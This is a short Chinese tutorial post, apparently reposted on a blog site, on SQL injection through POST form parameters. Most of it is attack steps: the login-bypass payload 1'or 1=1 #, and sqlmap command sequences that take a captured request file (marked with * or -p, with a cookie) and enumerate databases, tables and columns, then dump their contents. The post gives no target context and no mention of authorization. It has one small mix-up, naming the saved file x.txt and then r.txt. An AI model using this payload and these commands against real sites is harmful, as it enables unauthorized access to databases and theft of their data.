当前位置:   article > 正文

sql注入之post 传参方式的注入_sqlmap post注入

sqlmap post注入

在输入框里面进行注入

需要的注释符 #

是否存在注入点,注入点在有和数据库服务器交互的地方

万能密码

1'or 1=1 #

sqlmap 之post 注入1:

将变量参数位置加*

uname =name*
在sqlmap安装 目录下面新建文本文件为x.txt

python sqlmap.py   -r  r.txt

                 --dbs 

-D dn   --tables 

-D dn -T  tn --columns

-D dn -T tn -c1,c2  --dump

 

post 注入2:

先将post请求在burp捕获,将抓到的请求内容保存到文件中,
sqlmap  -r ./sqlmapfile(-r  捕获的请求文件及其所在位置) -p  id(加入指定参数)  --cookie="" 
加入-p 指定参数  -p id

 

 

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/天景科技苑/article/detail/919614
推荐阅读
相关标签
  

闽ICP备14008679号